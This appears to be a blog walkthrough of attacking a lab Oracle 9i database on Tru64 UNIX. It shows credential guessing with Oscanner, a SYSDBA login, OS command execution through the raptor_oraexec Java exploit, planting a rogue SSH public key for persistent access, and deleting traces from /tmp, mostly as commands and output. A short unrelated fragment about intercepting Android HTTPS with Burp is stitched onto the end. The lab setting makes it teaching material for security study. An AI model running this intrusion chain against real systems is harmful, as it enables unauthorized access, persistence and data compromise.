1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for Compaq Tru64 UNIX)
2100/tcp open ftp Oracle Enterprise XML DB ftpd 9.2.0.1.0
2301/tcp open http Compaq Diagnostics httpd (CompaqHTTPServer 2.1)
6112/tcp open dtspc?
8080/tcp open http Oracle XML DB Enterprise Edition httpd 9.2.0.1.0 (Oracle9i Enterprise Edition Release)
30000/tcp open ndmps?
49400/tcp open http Compaq Diagnostics httpd (CompaqHTTPServer 2.1)
Definitely some interesting daemons to poke at, but for now we will only concentrate on the Oracle DB TNS listener and the SSH. Lets go and get some OracleDB infosec tools on our Linux host and probe the remote DB a little
We can use a few Oracle enumeration tools like Oscanner (which is available only on Kali repo now) or some Metasploit Framework ones, but I prefer the Oscanner – it is available only on the kalilinux git repo now and is Java based – we will get it here
https://gitlab.com/kalilinux/packages/oscanner/-/archive/kali/master/oscanner-kali-master.tar.gz
Important note here – since I have setup the Oracle DB passwords with “p4ssw0rd” we will be cheating a little here and add this plaintext to the wordlist file dictionary.txt the oscanner uses
user@linux:/home/user/ORACLE/oscanner$ cat dictionary.txt
%username%
password
p4ssw0rd
oracle
So we execute the oscanner against our Tru64 5.1B Oracle DB server @ 10.0.2.100
user@linux:/home/user/ORACLE/oscanner$ ./oscanner.sh -s 10.0.2.100 -P 1521
Oracle Scanner 1.0.6 by patrik@cqure.net
--------------------------------------------------
[-] Checking host 10.0.2.100
[-] Checking sid (TSH1) for common passwords
[-] Account CTXSYS/CTXSYS is locked
[-] Account DBSNMP/DBSNMP found
[-] Enumerating system accounts for SID (TSH1)
[-] Succesfully enumerated 29 accounts
[-] Account HR/HR is locked
[-] Account MDSYS/MDSYS is locked
[-] Account OE/OE is locked
[-] Account OLAPSYS/MANAGER is locked
[-] Account ORDPLUGINS/ORDPLUGINS is locked
[-] Account ORDSYS/ORDSYS is locked
[-] Account OUTLN/OUTLN is locked
[-] Account PM/PM is locked
[-] Account QS/QS is locked
[-] Account QS_ADM/QS_ADM is locked
[-] Account QS_CB/QS_CB is locked
[-] Account QS_CBADM/QS_CBADM is locked
[-] Account QS_CS/QS_CS is locked
[-] Account QS_ES/QS_ES is locked
[-] Account QS_OS/QS_OS is locked
[-] Account QS_WS/QS_WS is locked
[-] Account SCOTT/TIGER found
[-] Account SH/SH is locked
[-] Account WKSYS/WKSYS is locked
[-] Checking user supplied passwords against sid (TSH1)
[-] Checking user supplied dictionary
[-] Account SYS/P4SSW0RD found
[-] Account SYSTEM/P4SSW0RD found
[-] Account WMSYS/WMSYS is locked
[-] Account XDB/XDB is locked
[-] Account WKPROXY/WKPROXY is locked
[-] Account ODM/ODM is locked
[-] Account ODM_MTR/ODM_MTR is locked
[-] Querying database for version information
OK we have found some accounts enabled and avaliable (also cracked since we have used a wordlist) So there are
sys/p4ssw0rd
system/p4ssw0rd
In order to use these credentials we need to connect to the Oracle DB somehow, this is done by the Oracle InstantClient, which comes in many different versions so the Oracle InstantClient support matrix can help us here
![]()
We will also need to download Oracle InstantClient (For Tru64 5.1B Oralce 9i we need
11.2.0.4.0 – newer ones won’t work and we can do so from this repo https://github.com/bumpx/oracle-instantclient
Git clone the whole repo and extract on your Linux box to /opt/oracle
git clone https://github.com/bumpx/oracle-instantclient
We can now configure Oracle Instant client 11.2.0.2 on our Linux Host
Extract to /opt/oracle <—- you can hold multiple clients there
user@panasonic$ ls -la /opt/oracle/
total 16
drwxr-xr-x 4 root root 4096 Jul 25 20:32 .
drwxr-xr-x 8 root root 4096 Jul 25 20:33 ..
drwxr-xr-x 3 root root 4096 Jul 25 01:08 instantclient_11_2
drwxr-xr-x 4 root root 4096 Jul 24 23:32 instantclient_19_3
And define the environment variables to use in your Shell environment on Linux Host, you need to run this prior calling the InstantListener
export PATH=$PATH:/opt/oracle/instantclient_11_2
export SQLPATH=/opt/oracle/instantclient_11_2
export TNS_ADMIN=/opt/oracle/instantclient_11_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_11_2
export ORACLE_HOME=/opt/oracle/instantclient_11_2
So lets use the fresh looted DB creds shall we ?
Before connecting to the remote Tru64 5.1B Oracle 9i make sure we define the remote host in /etc/hosts on our Linux Host
On Linux edit the /etc/hosts and add the remote hostname
10.0.2.100 tru64.virtual.com
And we will use next the cracked credentials for SYS user
user@linux:/home/user/ORACLE/oscanner$ sqlplus sys/p4ssw0rd@(description=(address_list=(address=(protocol=TCP)(host=tru64.virtual.com)(port=1521)))(connect_data=(sid=TSH1))) 'as sysdba'
SQL*Plus: Release 11.2.0.2.0 Production on Sat Sep 28 19:41:49 2019
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.1.0 - Production
SQL>
OK, right-on ! So we have a SQL shell with SYSDBA rights, apart from doing all nasty things to the DB we will be more interested if we can leverage the access and interact with the Tru64 5.1B filesystem via this connection and possibly gain SSH access through oracle account.
So how do we access the local filesystem from within Oracle ? We want an OS Shell !
We will use Marco Ivaldi’s raptor_oraexec.sql – java exploitation suite for oracle
https://www.exploit-db.com/exploits/2837
So copy/wget/curl the above exploit to your Linux Host directory from where we are running sqlplus and save it as raptor.sql
Lets connect to the remote Oracle DB again via the InstantClient sqlplus and execute Raptor’s raptor.sql script
SQL*Plus: Release 11.2.0.2.0 Production on Sat Sep 28 19:50:37 2019
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.1.0 - Production
SQL> @raptor.sql
Java created.
Procedure created.
Procedure created.
Procedure created.
SQL>
So now we are ready to run some commands ! Lets see how this exploitation suite works
We will create using InstantClient via the raptor.sql on the remote Tru64 UNIX a file /tmp/mytest which will contain a command “/bin/ls -la > /tmp/lsla”
SQL> exec javawritefile('/tmp/mytest', '/bin/ls -la > /tmp/lsla');
We execute the command
SQL> exec javacmd('/usr/bin/sh /tmp/mytest');
PL/SQL procedure successfully completed.
SQL> exec dbms_java.set_output(2000);
SQL> set serveroutput on;
And next we read the contents of “/tmp/lsla” since we don’t know whew the shell landed
SQL> exec javareadfile('/tmp/lsla');
total 54
drwxr-xr-x 2 oracle oinstall 8192 Sep 28 19:03 .
drwxr-xr-x 50 oracle oinstall 8192 Sep 28 00:52 ..
-rw-r--r-- 1 oracle oinstall 8385 Mar 9 2002 init.ora
-rw-r--r-- 1 oracle oinstall 12920 Mar 9 2002 initdw.ora
-rw-rw---- 1 oracle oinstall 24 Sep 28 19:16 lkORACLE
-rwSr----- 1 oracle oinstall 3072 Sep 28 09:50 orapwTSH1
-rw-rw---- 1 oracle oinstall 5120 Sep 28 01:33 spfileTSH1.ora
PL/SQL procedure successfully completed.
SQL>
So this looks like the contents of /u01/app/oracle/product/9.2.0.1.0/dbs
If we want to look what the / holds we need to change the commands accordingy
SQL> exec javawritefile('/tmp/mytest', '/bin/ls -la / > /tmp/lsla');
SQL> exec javacmd('/usr/bin/sh /tmp/mytest');
SQL> exec dbms_java.set_output(2000);
SQL> set serveroutput on;
SQL> exec javareadfile('/tmp/lsla');
total 31617
drwxr-xr-x 23 root system 8192 Sep 28 12:56 .
drwxr-xr-x 23 root system 8192 Sep 28 12:56 ..
-rw------- 1 root system 521 Sep 28 17:19 .bash_history
drwx------ 3 root system 8192 Sep 24 23:01 .cdsa
-rwxr----- 1 root system 1322 Oct 16 2002 .cshrc
drwxr-xr-x 3 root system 8192 Oct 16 2002 .dt
lrwxr-xr-x 1 root system 22 Sep 24 22:32 .local.. ->
cluster/members/{memb}
-rwxr----- 1 root system 1990 Oct 16 2002 .login
-rwxr--r-- 1 root system 2433 Oct 16 2002 .mrg...login
-rwxr----- 1 root system 1322 Oct 16 2002 .new...cshrc
-rwxr----- 1 root system 1990 Oct 16 2002 .new...login
-rwxr----- 1 root system 1864 Oct 16 2002 .new...profile
lrwxr-xr-x 1 root system 34 Sep 24 22:32 .osonly_tmp ->
cluster/members/{memb}/.osonly_tmp
-rwxr----- 1 root system 1864 Oct 16 2002 .profile
-rwxr----- 1 root system 1322 Oct 16 2002 .proto...cshrc
-rwxr----- 1 root system 1990 Oct 16 2002 .proto...login
-rwxr----- 1 root system 1864 Oct 16 2002 .proto...profile
drwxr-xr-x 2 root system 8192 Sep 24 22:59 .ssh2
drwxr-xr-x 2 root system 8192 Sep 25 23:46 .sysman
drwx------ 2 root system 8192 Sep 24 22:31 .tags
-rw-r--r-- 1 bin bin 2326 Oct 16 2002 GENERIC
drwxr-xr-x 2 root system 8192 Sep 25 23:48 TT_DB
lrwxr-xr-x 1 root system 7 Sep 24 22:32 bin -> usr/bin
drwxr-xr-x 4 root system 8192 Oct 16 2002 cluster
-rw------- 1 root system 761856 Sep 28 17:43 core
lrwxrwxrwx 1 root system 26 Sep 24 22:31 dev ->
cluster/members/{memb}/dev
drwxr-xr-x 9 root system 8192 Sep 24 22:58 devices
drwxr-xr-x 16 root system 16384 Sep 28 19:12 etc
-rwxr-xr-x 1 root system 12778096 Oct 16 2002 genvmunix
drwxr-xr-x 2 root system 8192 Sep 24 22:31 home
lrwxrwxrwx 1 root system 8 Sep 24 22:39 krb5 -> usr/krb5
lrwxr-xr-x 1 root system 7 Sep 24 22:32 lib -> usr/lib
drwxr-xr-x 2 root system 8192 Sep 24 22:46 mdec
drwxr-xr-x 3 root system 8192 Sep 25 23:01 mnt
-rw------- 1 root system 0 Sep 24 23:10 nohup.out
drwxr-xr-x 2 root system 8192 Sep 24 22:31 opt
-rwxr-xr-x 1 root system 102496 Oct 16 2002 osf_boot
dr-xr-xr-x 2 root system 524320 Sep 28 20:14 proc
-rw-r----- 1 root operator 8192 Sep 24 22:31 quota.group
-rw-r----- 1 root operator 16384 Sep 25 23:48 quota.user
drwxr-xr-x 10 root system 8192 Sep 24 22:51 sbin
drwxr-xr-x 2 root system 8192 Sep 24 22:34 shlib
drwxr-xr-x 2 root system 8192 Oct 16 2002 subsys
drwxr-xr-x 3 root system 8192 Sep 24 23:05 sys
drwxr-xr-x 5 root system 8192 Oct 16 2002 tcb
lrwxrwxrwx 1 root system 26 Sep 24 22:31 tmp ->
cluster/members/{memb}/tmp
lrwxrwxrwx 1 root system 8 Sep 26 23:55 u01 -> /usr/u01
drwxr-xr-x 31 root system 8192 Sep 26 23:54 usr
drwxr-xr-x 26 root system 8192 Sep 25 00:17 var
-rwxr-xr-x 1 root system 17956912 Sep 24 23:09 vmunix
PL/SQL procedure successfully completed.
SQL>
Great ! so how do we get a remote shell via SSH now ? It all depends on the environment of course. One method is to drop/replace authorized ssh keys in the home directory to which we can write with oracle account. Since we did not do this for the Oracle user we can simulate it here in our Tru64 5.1B environment.
Lets check the detault state of our Tru64 5.1B ssh2 install
The configuration file is in /etc/ssh2/sshd2_config
And should contain the publickey method for AllowedAuthentications
## Authentication
## Hostbased and PAM are not enabled by default.
# BannerMessageFile /etc/ssh2/ssh_banner_message
# BannerMessageFile /etc/issue.net
PasswordGuesses 1
AllowedAuthentications hostbased,publickey,password
# AllowedAuthentications publickey,password
# RequiredAuthentications publickey,password
# SshPAMClientPath ssh-pam-client
Good, its there by default, so we will generate our rogue ssh keypair for oracle user on our Linux Host
On our Linux machine we create a dummy directory to hold the Oracle ssh keys
user@linux:~$ mkdir $HOME/orassh
user@linux:~$ cd $HOME/orassh
user@linux:~/orassh/$ ssh-keygen -f $HOME/orassh/openssh_key
user@linux:~/orassh/$ ssh-keygen -e -f openssh_key.pub > openssh_key_converted.pub
Now we need to “upload” the openssh_key_converted.pub to the Tru64 5.1B UNIX via the Oracle shell
Lets change the raptor.sql command sequences a little. We will first need to create the
/usr/users/oracle/.ssh2 directory first (This is the user’s ssh location)
– We create oracle/.ssh2 directory first
SQL> exec javawritefile('/tmp/mytest', '/sbin/mkdir /usr/users/oracle/.ssh2');
SQL> exec javacmd('/usr/bin/sh /tmp/mytest');
– Next we plant the openssh_key_converted.pub to this directory
– On our Linux $HOME/orassh
– I did not yet figure out a convenient way to convert the public key but this method works just fine
user@panasonic ~/orassh $ cat openssh_key_converted.pub
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by user@panasonic from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQDAUxxLh24oa5vq6CkPVaZy91ZPWoNYKRUMmMZ9mk
w9YVju/FYATTAPwBkV4i4iRQ/V6rgU6/u7rzGX8uQHOY0EqdlzHeqmDjiav3lotJyp5KQw
Oj50QaFpFbP6PhERIc7swCAouPL58o7VY2GGSYpVO5Vnz9gS52wrkMAwBSDsWo7lYtGo3d
tJnl2apgq8Fgj672RgMrWBHnKGughyBECwrXwwtmslBA6Gdx1/US6EjAiQHGndI3xSc5SX
7CuVPNGzWsfrsW1vk6muOxbzmgjcsptVoq5T5aDJdRBL16Esptvv0klN9Ws8mxj+Nda3o4
tD9IwZoKX3PEncda8ogu0t
---- END SSH2 PUBLIC KEY ----
– We split each line into a separate SQL command
SQL> exec javawritefile('/tmp/key001','---- BEGIN SSH2 PUBLIC KEY ----');
SQL> exec javawritefile('/tmp/key002','Comment: "2048-bit RSA, converted by user@panasonic from OpenSSH"');
SQL> exec javawritefile('/tmp/key003','AAAAB3NzaC1yc2EAAAADAQABAAABAQDAUxxLh24oa5vq6CkPVaZy91ZPWoNYKRUMmMZ9mk');
SQL> exec javawritefile('/tmp/key004','w9YVju/FYATTAPwBkV4i4iRQ/V6rgU6/u7rzGX8uQHOY0EqdlzHeqmDjiav3lotJyp5KQw');
SQL> exec javawritefile('/tmp/key005','Oj50QaFpFbP6PhERIc7swCAouPL58o7VY2GGSYpVO5Vnz9gS52wrkMAwBSDsWo7lYtGo3d');
SQL> exec javawritefile('/tmp/key006','tJnl2apgq8Fgj672RgMrWBHnKGughyBECwrXwwtmslBA6Gdx1/US6EjAiQHGndI3xSc5SX');
SQL> exec javawritefile('/tmp/key007','7CuVPNGzWsfrsW1vk6muOxbzmgjcsptVoq5T5aDJdRBL16Esptvv0klN9Ws8mxj+Nda3o4');
SQL> exec javawritefile('/tmp/key008','tD9IwZoKX3PEncda8ogu0t');
SQL> exec javawritefile('/tmp/key009','---- END SSH2 PUBLIC KEY ----');
– Now we need to convert all this to a single file
SQL> exec javawritefile('/tmp/mytest', '/sbin/cat /tmp/key001 /tmp/key002 /tmp/key003 /tmp/key004 /tmp/key005 /tmp/key006 /tmp/key007 /tmp/key008 /tmp/key009 > /usr/users/oracle/.ssh2/openssh_key_converted.pub');
SQL> exec javacmd('/usr/bin/sh /tmp/mytest');
SQL> exec javawritefile('/usr/users/oracle/.ssh2/authorization', 'Key openssh_key_converted.pub');
So now we shold be all set for remote ssh login to Oracle account on the Tru64 5.1B UNIX, we run ssh from our Linux Host
user@panasonic ~/orassh$ ssh -i openssh_key oracle@10.0.2.100
Unable to negotiate with 10.0.2.100 port 22:
no matching key exchange method found.
Their offer: diffie-hellman-group1-sha
Older Tru64 5.1B UNIX SSH2 complains, so lets fix this by adding a local definition for this connection on our Linux Host to $HOME/.ssh/conig
Host 10.0.2.100
KexAlgorithms +diffie-hellman-group1-sha1
HostKeyAlgorithms +ssh-dss
And try again
user@panasonic ~/orassh$ ssh -i openssh_key oracle@10.0.2.100
Last login: Sat Sep 28 20:57:17 PDT 2019 from 10.0.2.2
Compaq Tru64 UNIX V5.1B (Rev. 2650); Tue Sep 24 23:09:04 PDT 2019
The installation software has successfully installed your system.
There are logfiles that contain a record of your installation. These are:
/var/adm/smlogs/install.cdf - configuration description file
/var/adm/smlogs/install.log - general log file
/var/adm/smlogs/install.FS.log - file system creation logs
/var/adm/smlogs/setld.log - log for the setld(8) utility
/var/adm/smlogs/fverify.log - verification log file
No mail.
-sh: H: not found
unknown mode: erase
$ id
uid=201(oracle) gid=200(oinstall) groups=201(dba)
Bingo :) we are in ! , Now lets clean up the mess in /tmp
$ cd /tmp
$ rm -f key*
$ rm -f mytest
$ rm -f lsla
So what next ? Some neat 0ldayz 1337 Tru64 5.1B local root exploit ? I know of one reliable in CDE, so we shall try to leverage this next time, or find some other Local Privilege Escalation bug to get root :)
I hope you have enjoyed reading it all the way here.
If you like to play around a little more feel free to use my GCC 4.4.7 compiler for Tru64 5.1B which is available here http://45.76.81.249/Tru64/
Video demo here
Reference :
https://oracle-base.com/articles/9i/oracle-db-9i-installation-on-tru64
https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux
View at Medium.com
We update the system, test the network etc. Now we are ready for the next stage. That is installing a custom CA into the Android system cacert directory so we can intercept the outgoing/incoming HTTPS traffic in Burp Suite. The only way that I know which works is to add the custom certificate to the root filesystem in /system/etc/security/cacert
Once we have these loaded, we setup Burp Suite to listen on the br0 interface @ 10.0.2.2
Next we need to tell Android to use the Proxy address and port for the WiFi connection, so we simply re-configure the networking (this is a bit clumsy in Android, and took me a while to figure out were the proxy setting was hidden in Oreo)
So it must look like the above.
Im unsure how to remount with RW tags on the live system
